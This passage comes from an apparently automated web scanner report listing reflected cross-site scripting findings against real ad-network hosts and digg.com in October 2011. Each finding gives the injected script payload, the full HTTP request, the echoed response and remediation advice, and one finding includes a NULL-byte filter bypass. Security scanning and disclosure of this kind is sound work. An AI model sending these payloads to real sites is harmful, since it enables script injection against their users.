This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_2167663178356bed<script>alert(1)</script>e111db97095&pid=024253fb-70f5-85e7-1960-9195b2c514a0&s=160x600&f=0.7&url=http%3A%2F%2Foptimized-by.rubiconproject.com%2Fa%2Fdk.html%3Fdefaulting_ad%3Dx2fde37.js%26size_id%3D9%26account_id%3D6005%26site_id%3D12414%26size%3D160x600&cid=oxpv1%3A34-632-1929-2127-6016&hrid=bbb136f626d991d201d06c2e0d3dcad0-1317825035 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://d.tradex.openx.com/afr.php?zoneid=6016&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f; p=1317601934

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache

OXM_2167663178356bed<script>alert(1)</script>e111db97095({"r":"\u003cdiv style\u003d\"position: absolute; width: 0px; height: 0px; overflow: hidden\"\u003e\u003cimg src\u003d\"http://bid.openx.net/log?l\u003dH4sIAAAAAAAAAD2PO07DQBRFjx2cTGYc3AAl31CO5HH8lZBoa
...[SNIP]...

2.18. http://d.tradex.openx.com/afr.php [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the cb request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fa2cc</script><script>alert(1)</script>6bb22505598 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=5991&cb=INSERT_RANDOM_NUMBER_HEREfa2cc</script><script>alert(1)</script>6bb22505598 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; __utma=20948333.858847159.1317599444.1317599444.1317599444.1; __utmz=20948333.1317599444.1.1.utmcsr=goal.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/teams/england/97/man-utd-news; __qca=P0-1745582797-1317599446738; OAID=6f699005174db05207a17138d8473dc0%27

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:37:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%275ddcd8062490906f11541205; expires=Thu, 04-Oct-2012 14:37:12 GMT; path=/
Content-Length: 3313
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5991&cb=INSERT_RANDOM_NUMBER_HEREfa2cc</script><script>alert(1)</script>6bb22505598&loc=")', 40000);
// ]]>
...[SNIP]...

2.19. http://d.tradex.openx.com/afr.php [loc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ebf0</script><script>alert(1)</script>37cf171afc2 was submitted in the loc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=5991&cb=INSERT_RANDOM_NUMBER_HERE&loc=2ebf0</script><script>alert(1)</script>37cf171afc2 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5991&cb=INSERT_RANDOM_NUMBER_HERE
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; __utma=20948333.858847159.1317599444.1317599444.1317599444.1; __utmz=20948333.1317599444.1.1.utmcsr=goal.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/teams/england/97/man-utd-news; __qca=P0-1745582797-1317599446738; OAID=6f699005174db05207a17138d8473dc0%27

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:39:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%275ddcd8062490906f11541205; expires=Thu, 04-Oct-2012 14:39:04 GMT; path=/
Content-Length: 3541
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5991&cb=INSERT_RANDOM_NUMBER_HERE&loc=2ebf0</script><script>alert(1)</script>37cf171afc2")', 40000);
// ]]>
...[SNIP]...

2.20. http://d.tradex.openx.com/afr.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2fc03</script><script>alert(1)</script>58f5bcbff52 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=5991&cb=INSERT_RANDOM_NUMBER_HERE&2fc03</script><script>alert(1)</script>58f5bcbff52=1 HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; __utma=20948333.858847159.1317599444.1317599444.1317599444.1; __utmz=20948333.1317599444.1.1.utmcsr=goal.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/teams/england/97/man-utd-news; __qca=P0-1745582797-1317599446738; OAID=6f699005174db05207a17138d8473dc0%27

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:37:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%275ddcd8062490906f11541205; expires=Thu, 04-Oct-2012 14:37:50 GMT; path=/
Content-Length: 3319
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5991&cb=INSERT_RANDOM_NUMBER_HERE&2fc03</script><script>alert(1)</script>58f5bcbff52=1&loc=")', 40000);
// ]]>
...[SNIP]...

2.21. http://d.tradex.openx.com/afr.php [zoneid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /afr.php

Issue detail

The value of the zoneid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdd50</script><script>alert(1)</script>3c853cdd483 was submitted in the zoneid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /afr.php?refresh=40&zoneid=5991cdd50</script><script>alert(1)</script>3c853cdd483&cb=INSERT_RANDOM_NUMBER_HERE HTTP/1.1
Host: d.tradex.openx.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OXRB=28_4196; __utma=20948333.858847159.1317599444.1317599444.1317599444.1; __utmz=20948333.1317599444.1.1.utmcsr=goal.com|utmccn=(referral)|utmcmd=referral|utmcct=/en/teams/england/97/man-utd-news; __qca=P0-1745582797-1317599446738; OAID=6f699005174db05207a17138d8473dc0%27

Response (redirected)

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:36:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.11
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: OAID=6f699005174db05207a17138d8473dc0%275ddcd8062490906f11541205; expires=Thu, 04-Oct-2012 14:36:32 GMT; path=/
Content-Length: 853
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Transitional//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd'>
<html xmlns='http://www.w3.org/1999/xhtml' xml:lang='en' lang='en'>
<head>
<ti
...[SNIP]...
<![CDATA[
setTimeout('window.location.replace("http://d.tradex.openx.com/afr.php?refresh=40&zoneid=5991cdd50</script><script>alert(1)</script>3c853cdd483&cb=INSERT_RANDOM_NUMBER_HERE&loc=")', 40000);
// ]]>
...[SNIP]...

2.22. http://digg.com/tools/diggthis.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c89ff"><script>alert(1)</script>931bd4c1ff1 was submitted in the REST URL parameter 1. This input was echoed as c89ff"><script>alert(1)</script>931bd4c1ff1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /tools%00c89ff"><script>alert(1)</script>931bd4c1ff1/diggthis.js HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://techland.time.com/2011/10/04/apple-announces-iphone-4s-old-design-new-specs-siri-assistant/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=d3afdeade10030459921e51ee27a79b6d31995d57b2768ffe39a9b8d07d16cbd; __utma=146621099.1594037511.1316307248.1316307248.1316307248.1; __utmz=146621099.1316307248.1.1.utmcsr=kuza55.blogspot.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=146621099.|2=Users=f%3DN%2Ct%3DN%2Cu%3D_=1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:34:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=356478 10.2.129.157
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 17741

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, break
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/tools%00c89ff"><script>alert(1)</script>931bd4c1ff1/diggthis.js.rss">
...[SNIP]...

2.23. http://digg.com/tools/diggthis.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /tools/diggthis.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %004ce53"><script>alert(1)</script>e1f90b16954 was submitted in the REST URL parameter 2. This input was echoed as 4ce53"><script>alert(1)</script>e1f90b16954 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /tools/diggthis.js%004ce53"><script>alert(1)</script>e1f90b16954 HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://techland.time.com/2011/10/04/apple-announces-iphone-4s-old-design-new-specs-siri-assistant/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=d3afdeade10030459921e51ee27a79b6d31995d57b2768ffe39a9b8d07d16cbd; __utma=146621099.1594037511.1316307248.1316307248.1316307248.1; __utmz=146621099.1316307248.1.1.utmcsr=kuza55.blogspot.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=146621099.|2=Users=f%3DN%2Ct%3DN%2Cu%3D_=1

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:34:58 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=338167 10.2.128.160
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 17741

<!DOCTYPE html>
<html xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, break
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/tools/diggthis.js%004ce53"><script>alert(1)</script>e1f90b16954.rss">
...[SNIP]...

2.24. http://img.mediaplex.com/content/0/11791/129988/lm_f35_Congress_300x600.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/11791/129988/lm_f35_Congress_300x600.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4c62'%3balert(1)//28451474222 was submitted in the mpck parameter. This input was echoed as b4c62';alert(1)//28451474222 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/11791/129988/lm_f35_Congress_300x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F11791-129988-20732-14%3Fmpt%3D8355020b4c62'%3balert(1)//28451474222&mpt=8355020&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/v%3B247213132%3B0-0%3B0%3B55018781%3B4986-300/600%3B42775747/42793534/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nationaljournal.com/politics/rick-perry-raises-17-million-in-third-quarter-20111005
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:31:42 GMT
Server: Apache
Last-Modified: Tue, 21 Jun 2011 18:20:03 GMT
ETag: "56450f-f71-4a63ce68b9ac0"
Accept-Ranges: bytes
Content-Length: 4777
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3b97/3/0/*/v;247213132;0-0;0;55018781;4986-300/600;42775747/42793534/1;;~sscs=?http://altfarm.mediaplex.com/ad/ck/11791-129988-20732-14?mpt=8355020b4c62';alert(1)//28451474222" target="_blank">
...[SNIP]...

2.25. http://img.mediaplex.com/content/0/11791/129988/lm_f35_Congress_300x600.js [mpck parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/11791/129988/lm_f35_Congress_300x600.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49a89"-alert(1)-"4df1bbdd434 was submitted in the mpck parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/11791/129988/lm_f35_Congress_300x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F11791-129988-20732-14%3Fmpt%3D835502049a89"-alert(1)-"4df1bbdd434&mpt=8355020&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/v%3B247213132%3B0-0%3B0%3B55018781%3B4986-300/600%3B42775747/42793534/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nationaljournal.com/politics/rick-perry-raises-17-million-in-third-quarter-20111005
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:31:40 GMT
Server: Apache
Last-Modified: Tue, 21 Jun 2011 18:20:03 GMT
ETag: "56450f-f71-4a63ce68b9ac0"
Accept-Ranges: bytes
Content-Length: 4771
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpcke/>';
if (mpcke == 1) {
mpcclick = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F11791-129988-20732-14%3Fmpt%3D835502049a89"-alert(1)-"4df1bbdd434");
mpck = "http://" + mpcclick;
}
else if (mpcke == 2) {
mpcclick2 = encodeURIComponent("altfarm.mediaplex.com%2Fad%2Fck%2F11791-129988-20732-14%3Fmpt%3D835502049a89"-alert(1)-"4df1bbdd434");
mpck = "
...[SNIP]...

2.26. http://img.mediaplex.com/content/0/11791/129988/lm_f35_Congress_300x600.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/11791/129988/lm_f35_Congress_300x600.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ac11"%3balert(1)//45013e6faf9 was submitted in the mpvc parameter. This input was echoed as 4ac11";alert(1)//45013e6faf9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/11791/129988/lm_f35_Congress_300x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F11791-129988-20732-14%3Fmpt%3D8355020&mpt=8355020&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/v%3B247213132%3B0-0%3B0%3B55018781%3B4986-300/600%3B42775747/42793534/1%3B%3B%7Esscs%3D%3f4ac11"%3balert(1)//45013e6faf9 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nationaljournal.com/politics/rick-perry-raises-17-million-in-third-quarter-20111005
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:31:44 GMT
Server: Apache
Last-Modified: Tue, 21 Jun 2011 18:20:03 GMT
ETag: "56450f-f71-4a63ce68b9ac0"
Accept-Ranges: bytes
Content-Length: 4773
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<mpvce/>';
if (mpvce == 1) {
mpvclick = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b97/3/0/*/v;247213132;0-0;0;55018781;4986-300/600;42775747/42793534/1;;~sscs=?4ac11";alert(1)//45013e6faf9");
mpvc = mpvclick;
}
else if (mpvce == 2) {
mpvclick2 = encodeURIComponent("http://ad.doubleclick.net/click;h=v8/3b97/3/0/*/v;247213132;0-0;0;55018781;4986-300/600;42775747/42793534/1;;~sscs=?4ac11";
...[SNIP]...

2.27. http://img.mediaplex.com/content/0/11791/129988/lm_f35_Congress_300x600.js [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/11791/129988/lm_f35_Congress_300x600.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fc5b9'%3balert(1)//1cd668fef70 was submitted in the mpvc parameter. This input was echoed as fc5b9';alert(1)//1cd668fef70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/11791/129988/lm_f35_Congress_300x600.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F11791-129988-20732-14%3Fmpt%3D8355020&mpt=8355020&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b97/3/0/%2a/v%3B247213132%3B0-0%3B0%3B55018781%3B4986-300/600%3B42775747/42793534/1%3B%3B%7Esscs%3D%3ffc5b9'%3balert(1)//1cd668fef70 HTTP/1.1
Host: img.mediaplex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.nationaljournal.com/politics/rick-perry-raises-17-million-in-third-quarter-20111005
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=OPT-OUT; __qca=P0-2105999177-1315520268755; __utma=183366586.499222152.1315520229.1315520229.1315520229.1; __utmz=183366586.1315520229.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=mediaplex

Response

HTTP/1.1 200 OK
Date: Wed, 05 Oct 2011 14:31:46 GMT
Server: Apache
Last-Modified: Tue, 21 Jun 2011 18:20:03 GMT
ETag: "56450f-f71-4a63ce68b9ac0"
Accept-Ranges: bytes
Content-Length: 4773
Content-Type: application/x-javascript

var mojopro2 = window.location.protocol;
if (mojopro2 == "https:") {
mojosrc = "https://secure.img-cdn.mediaplex.com/0/documentwrite.js";
}
else
{
mojosrc = "http://img-cdn.mediaplex.com/0/documentw
...[SNIP]...
<a href="http://ad.doubleclick.net/click;h=v8/3b97/3/0/*/v;247213132;0-0;0;55018781;4986-300/600;42775747/42793534/1;;~sscs=?fc5b9';alert(1)//1cd668fef70http://altfarm.mediaplex.com/ad/ck/11791-129988-20732-14?mpt=8355020" target="_blank">
...[SNIP]...

2.28. http://js.revsci.net/gateway/gw.js [csid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 85a9e<script>alert(1)</script>9b11c9e93dc was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=H0771085a9e<script>alert(1)</script>9b11c9e93dc HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.time.com/time/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=optout

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Wed, 05 Oct 2011 14:19:25 GMT
Cache-Control: max-age=86400, private
Expires: Thu, 06 Oct 2011 14:19:25 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
